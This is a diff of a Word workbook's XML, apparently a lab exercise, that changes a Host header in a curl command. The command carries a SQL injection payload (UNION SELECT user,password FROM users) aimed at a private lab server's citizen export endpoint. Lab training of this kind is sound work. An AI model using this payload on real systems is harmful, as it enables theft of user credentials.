--- a/contents/battle-workbook/compliance-w15.docx
+++ b/contents/battle-workbook/compliance-w15.docx
@@ -347,7 +347,7 @@
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
           <w:sz w:val="19"/>
         </w:rPr>
-        <w:t>curl -s -A "co15r1-kim" -H "Host: govportal.6v6.lab" \</w:t>
+        <w:t>curl -s -A "co15r1-kim" -H "Host: govportal.el34.lab" \</w:t>
         <w:br/>
         <w:t xml:space="preserve">  "http://192.168.0.161/api/citizens/export.csv?id=co15r1-kim%27%20UNION%20SELECT%20user,password%20FROM%20users--+&amp;Submit=Submit"</w:t>
       </w:r>
